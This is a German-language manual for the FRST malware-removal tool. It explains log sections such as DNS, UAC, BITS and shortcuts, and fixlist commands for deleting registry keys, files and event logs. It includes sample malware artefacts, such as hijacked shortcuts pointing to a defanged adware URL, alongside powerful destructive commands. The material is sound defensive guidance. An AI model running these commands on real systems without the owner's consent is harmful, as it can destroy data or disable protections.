Der Benutzer sollte den Desktop Hintergrund selbst auswählen.

In Windows XP:
Um den Desktophintergrund einzustellen, rechtsklicke irgendwo auf den Desktop und wähle Eigenschaften, wähle den Tab Desktop, wähle ein Bild aus, klicke auf "Übernehmen" und "OK".

In Windows Vista und höher:
Um den Desktophintergrund einzustellen, rechtsklicke irgendwo auf den Desktop und wähle Personalisierung, wähle Desktophintergrund, wähle ein Bild aus und klicke auf "Änderungen speichern".


DNS Servers - DNS, die aktuell in Benutzung ist. Diese Einträge sind nützlich, um DNS/Router Hijacker zu erkennen.
Suche auf der Seite WhoisLookup nach Informationen, ob der Server legitim ist oder nicht.

Zitat:

DNS Servers: 213.46.228.196 - 62.179.104.196

Wichtiger Hinweis: Diese Einträge werden nicht aus der Registry ausgelesen, eine Internetverbindung ist hier notwendig.
Wenn der Scan im abgesicherten Modus ausgeführt wurde oder keine Internetverbindung besteht, erscheint der Eintrag wie folgt:

Zitat:

DNS Servers: Datenträger ist nicht mit dem Internet verbunden.

UAC Einstellungen
Aktiviert (Standardeinstellung):

Zitat:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Deaktiviert:

Zitat:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

Diese Änderung kann sowohl vom Nutzer selbst als auch von Malware vorgenommen worden sein. Sollte es nicht eindeutig Malware zuzuordnen zu sein, sollte man den User fragen bevor man etwas ändert.


SmartScreen (Windows 8+)
Für Desktopanwendungen und Dateien:

Zitat:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Daten des Wertes)

Daten des Wertes, die von Windows unterstützt werden: Block | Warn | Off (Windows 10 Version 1703+) oder RequireAdmin (Standardeinstellung) | Prompt | Off (ältere Systeme).

Ein fehlender (Standardeinstellung unter Windows 10 Version 1703+) oder leerer Wert wird auf die folgende Art angezeigt:

Zitat:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

Telephony Service Providers (TSP)
Die Standardeinträge und einige Einträge von Drittanbietern werden gefiltert. Die Zeile ist nur sichtbar, wenn ein benutzerdefinierter Eintrag erkannt wird.
Beispiel:

Zitat:

HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName3 -> C:\Windows\system32\unbekannt.tsp (Herausgeber)

Bösartige oder zerstörte Einträge erfordern einen manuellen Registry-Fix. Dazu müssen die dazugehörige PoviderIDx und ProviderFileNamex Einträge entfernt und die übrigen Einträge dementsprechend umnummeriert werden.


BITS
Listet BITS-Jobs über eine Benachrichtigungsbefehlszeile auf. Siehe: Attacker Use of the Windows Background Intelligent Transfer Service.

Zitat:

BITS: {ID des Jobs} - (Name des Jobs) -> [NotifyCmdLine: Befehl] [files: Remote-Pfad -> Lokaler Pfad]

Um alle BITS-Jobs zu entfernen, verwende den Befehl EmptyTemp: .


Windows Firewall
Beispiel:

Zitat:

Windows Firewall ist aktiviert.

Ob die Windows Firewall aktiv oder inaktiv ist, wird ebenfalls angegeben. Wenn FRST im abgesicherten Modus ausgeführt wurde oder wenn FRST nicht in der Lage ist den Status abzufragen, zB aufgrund eines defekten Systems, wird diese Zeile nicht gezeigt.


Network Binding (Windows 8+)
Listet verfügbare Netzwerkadapter und nicht standardmäßige Komponenten auf, die an Netzwerkadapter angeschlossen sind. Vergleichen Sie den Abschnitt Drivers (Treiber), um ein passendes Element zu finden.

Beispiel:

Zitat:

inspect: COMODO Internet Security Firewall Driver

Zitat:

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [129208 2019-10-16] (Comodo Security Solutions, Inc. -> COMODO)

Wenn eine Standardprogramm-Deinstallation die Elemente nicht entfernt, muss die Netzwerkbindung vor der Verarbeitung des Treibers entfernt werden. Befolgen Sie die unter ESET Wissensdatenbank beschriebenen Schritte.

Wichtiger Hinweis: Stellen Sie sicher, dass die Netzwerkbindung entfernt wurde, bevor Sie den Treiber in die fixlist aufnehmen. Andernfalls wird durch Entfernen des Treibers eine Netzwerkverbindung unterbrochen.



MSCONFIG/TASK MANAGER disabled items (MSCONFIG/TASK MANAGER Deaktivierte Einträge)
Dieser Abschnitt ist besonders dann von Nutzen, wenn jemand bereits versucht hat Malware anhand von MSCONFIG oder TASK MANAGER zu deaktivieren oder wenn jemand den Rechner zu sehr modifiziert hat und nun einige Dienste nicht mehr zum laufen bringen kann.
Beispiel:
Windows 7 und ältere Systeme:

Zitat:

MSCONFIG\Services: Quotenamron => 2
MSCONFIG\startupfolder: C:^Users^User^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^339bc1.lnk => C:\Windows\pss\339bc1.lnk.Startup
MSCONFIG\startupreg: AdAnti => C:\Program Files (x86)\AdAnti\AdAnti.exe /S

Folgende Einträge sind möglich:
Dienst:

Zitat:

MSCONFIG\Services: Name des Diensts => Ursprüglicher Starttyp

AutoStart-Ordner:

Zitat:

MSCONFIG\startupfolder: Ursprünglicher Pfad (wobei Windows "\" mit "^" ersetzt hat) => Pfad des Backups das Windows gemacht hat.

Run-Eintrag:

Zitat:

MSCONFIG\startupreg: Wert => Pfad zur Datei.

TASK MANAGER in Windows 8 und neuere Systeme:

Zitat:

HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\StartupFolder: => "SmartWeb.lnk"
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\Run: => "svchost0"

Wichtiger Hinweis: Windows 8 und danach nutzen msconfig nur noch für Dienste. Startup Einträge werden per Taskmanager gemanaged und in anderen Registry Einträgen gespeichert. Ein deaktivierter Eintrag wird zweimal aufgeführt: Einmal in FRST.txt(Registry section) und einmal in Addition.txt.

Einträge aus diesem Bereich können in die Fixlist mit aufgenommen werden. FRST wird dabei die folgenden Schritten durchführen:

• Im Fall eines deaktivierten Dienstes wird FRST sowohl den Schlüssel in MSCONFIG als auch den Dienst selbst entfernen.
• Im Fall deines deaktivierten Run-Eintrages wird FRST sowohl den Schlüssel/Wert in MSCONFIG/Task Manager als auch den Run-Eintrag selbst entfernen (auf neueren Systemen).
• Im Fall eines Elements im Bereich der Startup-Ordner wird FRST sowohl den Schlüssel in MSCONFIG/Task Manager als auch das Backup der Datei (welches selbst von Windows auf älteren Systemen erstellt wird) oder die Datei selbst (auf neueren Systemen) entfernen.

Wichtig:
Entferne einen Eintrag von diesem Bereich nur, wenn du sicher bist, dass es ein Malware-Eintrag ist. Wenn du unsicher bist, entferne den jeweiligen Eintrag nicht (nicht, dass legitime Einträge entfernt werden).
Im Falle von deaktivierten legitimen Einträge, die wieder aktiviert werden sollen, sollte ein Benutzer diese mit Hilfe von MSCONFIG oder dem TaskManager wieder aktivieren.



FirewallRules (Firewall Regeln)
Liste der FirewallRules, AuthorizedApplications und GloballyOpenPorts Einträge.
Beispiel (Windown 10):

Zitat:

FirewallRules: [{E3D59A00-E41A-4AE5-AECF-E7AC117FBF83}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Chao Wei -> )
FirewallRules: [{7FEA26C4-3ECE-4431-8FA1-E9AFE7F3B0DD}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation -> Mozilla Corporation)

Beispiel (XP):

Zitat:

StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\bin\FirefoxUpdate.exe] => Enabled:Update service
StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\Firefox.exe] => Enabled:Firefox browser
StandardProfile\GloballyOpenPorts: [2900:TCP] => Enabled:ztdtqhnh

Wenn ein Eintrag in die Fixlist übernommen wird, so wird der Registryeintrag entfernt. Dazughörige Dateien werder NICHT entfernt.



Restore Points (Wiederherstellungspunkte) - Siehe Wiederherstellungspunkte weiter oben
Führt Wiederherstellungspunkte im folgenden Format auf:

Zitat:

18-04-2016 14:39:58 Windows Update
18-04-2016 22:04:49 Restore Point Created by FRST

Ist die Systemwiederherstellung deaktviert, zeigt FRST eine Warnung:

Zitat:

ACHTUNG: Systemwiederherstellung ist deaktiviert (Total:59.04 GB) (Free:43.19 GB) (73%)

Wichtiger Hinweis: Dieser Eintrag bezieht sich auf die Systemwiederherstellung, wenn sie standardmäßig deaktiviert ist. Ist die Systemwiederherstellung mittels Gruppenrichtlinien deakiviert, wird dies in FRST.txt vermerkt (in der Registry Sektion). In beiden Fällen kann die Systemwiederherstellung automatisch aktiviert werden. Siehe dazu die Befehle CreateRestorePoint: und SystemRestore:.



Faulty Device Manager Devices (Fehlerhafte Geräte im Gerätemanager)
Beispiel:

Zitat:

Name: bsdriver
Description: bsdriver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: bsdrive
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

Event log errors (Fehlereinträge in der Ereignisanzeige)
- Applikationsfehler
- Systemfehler
- CodeIntegrityfehler
- Windows Defender Fehler und Warnungen



Memory info (Speicherinformationen) - Siehe Speicherinformationen weiter oben



Drives (Laufwerke)



MBR & Partition Table (MBR & Partitionstabelle) - Siehe Laufwerke und MBR & Partitionstabelle weiter oben

Weitere optionale Suchläufe

Optionale Suchläufe
Man kann die optionalen Suchläufe mithilfe der Checkboxen aktivieren.



List BCD (BCD auflisten)
Liste der Boot Configuration Data.



SigCheckExt
Listet alle unsignierten .exe und .dll Dateien in Standard Ordnern auf. Die Ausgabe ist auf die selbe Art und Weise wie die "Ein Monat" Liste formatiert.



Shortcut.txt
Erstellt eine Liste der Verknüpfungen für alle Benutzerkonten. Gehijackte Einträge können der Fixlist beigefügt werden.

Zitat:

Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336"
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%

Um die Zeilen ShortcutWithArgument: zu entfernen, muss man lediglich die Zeilen kopieren und in die fixlist einfügen. Aber um Shortcut: Objekte selbst zu entfernen, muss der jeweilige Pfad separat eingefügt werden.

Zitat:

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336"
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
C:\Program Files (x86)\jIxmRfR
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

Wichtiger Hinweis: FRST entfernt das Argument aus der Verknüpfung mit Ausnahme des Internet Explorer (No Add-ons).lnk Eintrags. Diese Verknüpfung ist standardmässig mit einem Argument versehen ( -extoff) und dient dazu den Internet Explorer ohne Add-Ons zu starten. Es wird zur Fehlerdiagnose bei Internet Explorer benutzt, daher stellt FRST das Argument automatisch wieder her, wenn es dieses löschen soll.

Falls ein anderes Programm das Argument von Internet Explorer (No Add-ons).lnk gelöscht hat, wird FRST den Eintrag nicht mehr unter ShortcutWithArgument: aufführen und somit kann das fehlende Argument auch nicht von FRST wiederhergestellt werden. In diesem Fall muss der Nutzer es manuell wiederherstellen.

Um den Eintrag von Hand wiederherzustellen, sollte der Nutzer den Ordner in dem Internet Explorer (No Add-ons).lnk liegt öffnen:
Mit einem Rechts-Klick den Eintrag anwählen und Eigenschaften auswählen.
Unter Ziel dann zwei Leerzeichen und -extoff dem Pfad anfügen.
Zum Schluss Anwenden und OK clicken.



90 Days Files (Dateiliste 90 Tage)
Wenn die Option "Dateiliste 90 Tage" angehakt ist, erstellt FRST die "Three months (Created/Modified) (Drei Monate (Erstellte/Geänderte))" Liste statt der "One month (Created/Modified) (Ein Monat (Erstellte/Geänderte))".



Suchfunktionen

Search Files (Datei-Suche)
Es gibt eine Suchfunktion in FRST. Es ist der Eingabe-Bereich im Hauptfenster von FRST. Es reicht, einfach den zu suchenden Dateinamen dort einzugeben. Platzhalter sind erlaubt. Um nach mehreren Dateinamen zu suchen, trennt man diese mit einem Strichpunkt ;

Zitat:

Begriff;Begriff

Zitat:

*Begriff*;*Begriff*

Wenn der "Datei-Suche"-Button gedrückt wird, gibt es eine Info, dass die Suche jetzt startet. Danach zeigt ein Ladebalken den Fortschritt der Suche. Wenn die Suche beendet ist, erscheint ein Popup mit der entsprechenden Meldung. Die Ergebnisse der Suche werden in der Datei Search.txt im selben Ordner wie FRST gespeichert.

Die gefundenen Dateien werden dann mit ihrem Erstellungsdatum, dem Datum der letzten Änderung, der Grösse, der Attribute, des Firmennamens, der MD5 Prüfsumme und ihrer digitalen Signatur aufgeführt:

Zitat:

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.15063.608_none_2ad0781c8951a362\dnsapi.dll [2017-03-18 22:57][2017-03-18 22:57] 000661224 _____ (Microsoft Corporation) 0F9FA6A2D4EAE50393DCE473759A9845 [Datei ist digital signiert]

Die Suche ist auf das Systemlaufwerk beschränkt. In einigen Fällen kann die legitime Datei fehlen oder beschädigt sein wodurch der Rechner unbootbar wird. Es ist möglich, dass es zudem keine Ersatzdatei auf dem System gibt. Für solche Fälle, scannt FRST auch die X: Partition im Recovery mode (Vista und neuer). Wenn also zum Beispiel die services.exe fehlt, könnte diese von X:\windows\system32\services.exe nach C:\windows\system32 kopiert werden.

Wichtiger Hinweis: Die X: Partition enthält nur die 64bit-version einer Datei für 64bit-Systeme

Der Button "Datei-Suche" kann auch für weitere Suchen genutzt werden, siehe dazu FindFolder: und SearchAll: weiter unten. Die Ergebnisse werden in die Logdatei Search.txt geschrieben.



Search Registry (Registry-Suche)
Man kann mit FRST auch nach Registryeinträgen suchen, dafür fügt man den zu suchenden Begriff einfach in das Eingabe-Feld ein, wenn man nach mehreren Eingaben gleichzeitig suchen will kann man diese durch ein ; trennen. Mit einem Klick auf den Button "Registry-Suche" wird eine Suche gestartet.

Zitat:

Begriff;Begriff

Anders als bei der Dateisuche, sollte man bei der Registrysuche keine Platzhalter verwenden. In der Tat werden Zeichen wie *,?, usw als entsprechendes Zeichen interpretiert und nicht als Platzhalter. Wenn man diese Zeichen in einem Suchterm am Ende oder Anfang einfügt ignoriert FRST diese und sucht nach dem Term ohne die entsprechenden Sonderzeichen.

Ein Log mit dem Namen SearchReg.txt wird in dem Ordner erstellt, in dem sich auch FRST befindet.

Wichtiger Hinweis: Die Registry suche funktioniert nicht in dem Recovery Environment.



FindFolder:
Damit können Ordner auf dem Systemlaufwerk gesucht werden. Dazu verwendet man die folgende Syntax im Suchfeld und drückt im Anschluss auf den Button "Datei-Suche":

Zitat:

FindFolder: Begriff;Begriff

Platzhalter werden unterstützt:

Zitat:

FindFolder: *Begriff*;*Begriff*

SearchAll:
Damit kann ein vollständiger Suchlauf (Dateien, Ordner, Registry) für einen oder mehrere Begriffe durchgeführt werden. Dazu verwendet man die folgende Syntax im Suchfeld und drückt den Button "Datei-Suche":

Zitat:

SearchAll: Begriff;Begriff

Bitte keine Platzhalter für die Begriffe verwenden. FRST interpretiert die Begriffe als *Begriffe* im Falle von Dateien und Ordner.

Wichtiger Hinweis: Der vollständie Suchlauf ist in der Recovery Environment auf Dateien und Ordner beschränkt.

Befehle

Sämtliche Befehle in FRST sollten auf einer eigenen einzelnen Zeile stehen, da FRST die fixlist Zeile für Zeile ausliest und verarbeitet.

Kurzübersicht der Befehle
Wichtiger Hinweis: Befehle unterliegen nicht der Groß- und Kleinschreibung.


Befehle, die nur im normalen Modus benutzt werden können:

CreateRestorePoint:
SystemRestore:
TasksDetails:


Befehle, die nur im normalen oder abgesicherten Modus benutzt werden können:

CloseProcesses:
EmptyEventLogs:
EmptyTemp:
Powershell:
Reboot:
RemoveProxy:
StartPowershell: — EndPowershell:
Virusscan:
Zip:


Befehle, die im normalen oder abgesicherten Modus und in der Recovery Environment benutzt werden können:

cmd:
Comment:
Copy:
CreateDummy:
DeleteJunctionsInDirectory:
DeleteKey: und DeleteValue:
DeleteQuarantine:
DisableService:
ExportKey: und ExportValue:
File:
FilesInDirectory: und Folder:
FindFolder:
Hosts:
ListPermissions:
Move:
Reg:
RemoveDirectory:
Replace:
RestoreQuarantine:
SaveMBR:
SetDefaultFilePermissions:
StartBatch: — EndBatch:
StartRegedit: — EndRegedit:
Symlink:
testsigning on:
Unlock:


Nur in der Recovery Environment nutzbar:

LastRegBack:
RestoreFromBackup:
RestoreMbr:

Beispiele

CloseProcesses:
Beendet alle unwichtigen Prozesse. Hilft dabei den Fix schneller und sicherer auszuführen.

Wenn dieser Befehl in den Fix eingebaut wird, startet FRST am Schluss den Rechner automatisch neu. Man braucht dafür kein "Reboot:".
Der Befehl CloseProcesses: ist in der Recovery Console weder notwendig noch vorhanden.



CMD:
Gelegentlich möchte man ein Kommandozeilenskript ausführen. Der CMD: Befehl ist für solche Fälle gedacht:

Zitat:

CMD: Befehl

Wenn man mehr als einen Befehl ausführen möchte, dann muss man jede Zeile mit CMD: beginnen.
Beispiel:

Zitat:

CMD: copy /y c:\windows\minidump\*.dmp e:\
CMD: bootrec /FixMbr

Der erste Befehl kopiert die minidump-Dateien auf den USB-Stick (falls dieser den Laufwerkbuchstaben E: hat).
Der zweite Befehl repariert den MBR für Windows Vista und neuer.

Alternativ können die Befehle StartBatch: — EndBatch: benutzt werden. (Siehe unten)

Wichtiger Hinweis: Anders als bei den Befehlen von FRST muss hier die korrekte Syntax für die Kommandozeile eingehalten werden. Das heißt auch, dass man die Pfade mit Gänsefüßchen umschließen muss, wenn sie Leerzeichen enthalten.




Comment:
Fügt eine Notiz hinzu, um Feedback zum Inhalt der Fixlist zu geben.
Beispiel:

Zitat:

Comment: Der folgende Befehl entfernt alle Netzwerk-Proxys aus dem System
RemoveProxy:

Copy:
Damit können Dateien und Ordner in einer ähnlichen Art und Weise wie xcopy kopiert werden.

Die Syntax lautet:

Zitat:

Copy: QuelleDatei/Ordner ZielpfadOrdner

Sollte der Zielordner nicht vorhanden sein, wird er automatisch erstellt.

Beispiel:

Zitat:

Copy: C:\Users\User\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb C:\Users\User\Desktop\Edge Backup
Copy: C:\Windows\Minidump F:\

Wichtiger Hinweis: Um einzelne Dateien zu ersetzen, wird empfohlen, den Befehl Replace: zu verwenden. Für den Fall einer existierenden Zieldatei wird der Befehl Copy: nur versuchen, die Datei zu überschreiben, während der Befehl Replace: zusätzlich versucht, die Datei zu entsperren und in die Quarantäne zu verschieben.



CreateDummy:
Erzeugt einen gesperrten Scheinordner, um die Wiederherstellung von schädlichen Dateien und Ordnern zu verhindern. Der Scheinordner sollte nach dem Löschen der Malware ebenfalls wieder entfernt werden.
Beispiel:

Zitat:

CreateDummy: C:\Windows\System32\böse.exe
CreateDummy: C:\ProgramData\Böse

CreateRestorePoint:
Erstellt einen Wiederherstellungspunkt.

Wichtiger Hinweis: Diese Befehl funktioniert nur im Normalen Modus. Außerdem wird versucht, die Systemwiederherstellung zu aktivieren, sodass der Befehl „SystemRestore: On“ nicht verwendet werden muss.



DeleteJunctionsInDirectory:
Um symbolische Links zu löschen, sollte man folgenden Befehl benutzen:

Zitat:

DeleteJunctionsInDirectory: Pfad

Beispiel:

Zitat:

DeleteJunctionsInDirectory: C:\Program Files\Windows Defender

DeleteKey: und DeleteValue:
Dies ist der effizienteste Weg, um Schlüssel/Werte zu löschen, da hierbei Beschränkungen eines Standardlöschalgorythmus wie sie in "Reg:" und "StartRegedit: — EndRegedit:" auftreten können, umgangen werden.
Die Syntax sieht so aus:

1. für Schlüssel

Zitat:

DeleteKey: Schlüssel

Alternativ ist auch ein REGEDIT Format möglich:

Zitat:

[-Schlüssel]

2. für Werte

Zitat:

DeleteValue: Schlüssel|Wert

Wenn es sich bei dem Wert um den Standardwert handelt, dann muss man den Namen des Wertes leer lassen:

Zitat:

DeleteValue: Schlüssel|

Beispiele:

Zitat:

DeleteKey: HKLM\SOFTWARE\Microleaves
DeleteValue: HKEY_CURRENT_USER\Environment|SNF
DeleteValue: HKU\S-1-5-21-3145329596-257967906-3285628945-1000\Software\Clients\StartMenuInternet|
[-HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Dataup]

Mit diesen Befehlen ist man in der Lage, Schlüssel/Werte trotz fehlender Rechte, Schlüssel/Werte mit eingebetteten Nullen und symbolische Verlinkungen in der Registry zu löschen.
Der Befehl Unlock: muss nicht extra verwendet werden.

Bei Schlüsseln/Werten, die durch eine laufende Software geschützt werden (diese Schlüssel/Werte geben die Rückmeldung "Zugriff verweigert" aus), muss statt dieses Befehls ein Skript im abgesicherten Modus benutzt werden und man löscht die Hauptkomponente zuerst.

Wichtiger Hinweis: Wenn ein symbolischer Link gelöscht werden soll, so entfernt FRST nur den Link selbst, nicht aber das Ziel auf den der Link verweist. Dies soll verhindern dass FRST einen legitimen Eintrag löscht, wenn ein bösartiger Link auf ihn verweist. Sollten sowohl der Link als auch das Ziel auf der er verweist gelöscht werden, müssen beide im Fix-Script aufgeführt werden.



DeleteQuarantine:
Nachdem die Malware entfernt wurde, sollte der Ordner %SystemDrive%\FRST (normalerweise C:\FRST) ebenfalls entfernt werden. In einigen Fällen beinhaltet der Ordner Quarantine aber Dateien ohne Berechtigungen oder andere ungewöhnliche Dateien und die Quarantine kann nicht automatisch gelöscht werden. Dann kann man diese mit dem Befehl DeleteQuarantine: entfernen.

Wichtiger Hinweis: Die automatische FRST-Deinstallation (siehe dazu die Beschreibung unter Einleitung) beinhaltet die gleiche Fähigkeit, eine gesperrte Quarantäne zu löschen.



DisableService:
Um einen Dienst oder Treiber zu deaktivieren, kann man diesen Befehl wie folgt nutzen:

Zitat:

DisableService: Dienstname

Beispiel:

Zitat:

DisableService: sptd
DisableService: Wmware Nat Service

FRST ändert den Starttyp des zu deaktivierenden Dienstes und der Dienst wird dadurch beim nächsten Neustart nicht mehr ausgeführt.

Wichtiger Hinweis: Der Servicename sollte einfach aus dem FRST-Log kopiert werden, ohne etwas zu verändern. Anführungszeichen sind nicht notwendig.



EmptyEventLogs:
Löscht Windows-Ereignisprotokolle. Die Gesamtzahl der gelöschten Protokolle und eventuelle Fehler werden aufgelistet.



EmptyTemp:
Die folgenden Ordner und Dateien werden geleert:
- Windows Temp
- Benutzer Temp
- Caches, HTML5 Speicherungen, Cookies and Verlauf für alle von FRST gescannten Browser außer Firefox Klone.
- Java Cache
- Zuletzt geöffnete Dateien
- Discord cache
- Steam HTML cache
- Explorer thumbnail und icon cache
- BITS transfer queue (qmgr.db und qmgr*.dat Dateien)
- WinHTTP AutoProxy cache
- DNS cache
- Papierkorb.

Wenn der Befehl EmptyTemp: benutzt wird, wird der Rechner anschließend neu gestartet. Man braucht Reboot: nicht zu benutzen. Zudem wird EmptyTemp: immer als letzter Befehl ausgeführt nachdem alle anderen Befehle abgearbeitet wurden, unabhängig davon wo es im Skript selbst steht.

Wichtiger Hinweis: EmptyTemp löscht endgültig. Die Dateien werden nicht in die Quarantäne verschoben.

Wichtiger Hinweis: Der Befehl ist in der Recovery Environment deaktiviert, um Schäden zu vermeiden.



ExportKey: und ExportValue:
Ein zuverlässiger Weg, um den Inhalt eines Schlüssels zu inspizieren. Die Befehle überwinden einige Beschränkungen der Dateien regedit.exe und reg.exe. Der Unterschied zwischen den Befehlen ist der Umfang.
ExportKey: Listet alle Werte und Unterschlüssel rekursiv während ExportValue: nur Werte im betreffenden Schlüssel auflistet

Die Syntax sieht so aus:

Zitat:

ExportKey: Schlüssel

Zitat:

ExportValue: Schlüssel

Beispiel:

Zitat:

ExportKey: HKEY_LOCAL_MACHINE\SOFTWARE\Verdächtiger Schlüssel

Zitat:

================== ExportKey: ===================

[HKEY_LOCAL_MACHINE\SOFTWARE\Verdächtiger Schlüssel]
[HKEY_LOCAL_MACHINE\SOFTWARE\Verdächtiger Schlüssel\UngültigerSchlüssel ]
"Versteckter Wert"="Versteckte Daten"
[HKEY_LOCAL_MACHINE\SOFTWARE\Verdächtiger Schlüssel\GesperrterSchlüssel]
HKEY_LOCAL_MACHINE\SOFTWARE\Verdächtiger Schlüssel\GesperrterSchlüssel => Zugriff verweigert.

=== Ende von ExportKey ===

Wichtiger Hinweis: Die Befehle sind nur für Untersuchungen und können nicht für Sicherungen oder Imports verwenden werden.



File:
Dieser Befehl wird genutzt, um Datei-Infos anzugeben. Mehrere Dateien können, getrennt durch Strichpunkte, eingefügt werden.
Die Syntax ist wie folgt:

Zitat:

File: Pfad;Pfad

Beispiel:

Zitat:

File: C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe

Das Log sieht dann wie folgt aus:

Zitat:

========================= File: C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe ========================

C:\Users\User\Desktop\amtemu.v0.9.1-painter.exe
File not signed
MD5: A209B88B9B2CF7339BE0AC5126417875
Creation and modification date: 2024-03-09 12:20 - 2017-04-10 11:44
Size: 002546176
Attributes: ----A
Company Name: PainteR
Internal Name: ProxyEmu
Original Name: emuext.exe
Product: ProxyEmu
Description: ProxyEmu
File Version: 0.9.1.0
Product Version: 0.9.1.0
Copyright: painter
Virusscan: https://virusscan.jotti.org/filescanjob/k4nj4qatm6

====== End of File: ======

Wichtiger Hinweis: Eine Überprüfung der digitalen Signatur ist in der Recovery Environment nicht verfügbar.



FilesInDirectory: und Folder:
Dieser Befehl wird genutzt, um den Inhalt von Ordnern anzugeben. Der Befehl FilesInDirectory: ist dafür gedacht, spezifische Dateien aufzulisten, die Mustern (mit einem oder mehreren Platzhaltern *) folgen. Im Gegensatz dazu erhält man mit dem Befehl Folder: den vollständigen Inhalt eines Ordners. Beide Befehle geben auch MD5 Prüfsummen (für alle Dateien) und digitale Signaturen (für .exe, .dll, .sys and .mui Dateien) aus.
Die Syntax sieht so aus:

Zitat:

FilesInDirectory: Pfad\Muster;Muster

Zitat:

Folder: Pfad

Beispiel:

Zitat:

FilesInDirectory: C:\Windows\desktop-7ec3qg0\*.exe;*.dll
Folder: C:\Windows\desktop-7ec3qg0

Wichtiger Hinweis: Der Befehl Folder: funktioniert rekursiv und listet den Inhalt aller Unterordner auf. Daher kann diese Befehl sehr lange Logdateien produzieren.



FindFolder:
Siehe dazu Suchfunktionen im Bereich Weitere optionale Suchläufe. Der Befehl funktioniert genau wie FindFolder: in der Suchbox, aber die Ergebnisse werden in die Fixlog.txt geschrieben.



Hosts:
Setzt die Hosts-Datei auf den Standardinhalt zurück. Siehe auch Hosts unter Hauptsuchlauf (FRST.txt).



ListPermissions:
Führt die Nutzerrechte für Dateien/Ordner und Registryschlüssel auf.

Zitat:

ListPermissions: Pfad/Schlüssel

Beispiel:

Zitat:

Listpermissions: C:\Windows\Explorer.exe
Listpermissions: C:\users\user\appdata
ListPermissions: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip
ListPermissions: HKLM\SYSTEM\CurrentControlSet\services\afd

Move:
Dieser Befehl wird benutzt, um eine Datei umzubenennen oder zu verschieben. Die Syntax ist wie folgt:

Zitat:

Move: Ursprung Ziel

Beispiel:

Zitat:

Move: c:\WINDOWS\system32\drivers\afd.sys c:\WINDOWS\system32\drivers\afd.sys.alt
Move: c:\WINDOWS\system32\drivers\atapi.bak c:\WINDOWS\system32\drivers\atapi.sys

Das Programm verschiebt die Ziel-Datei (falls vorhanden) in die Quarantäne und verschiebt dann die Ursprungsdatei zum Ziel-Namen.

Wichtiger Hinweis: Man kann mit dem Befehl auch einfach Dateien umbenennen.

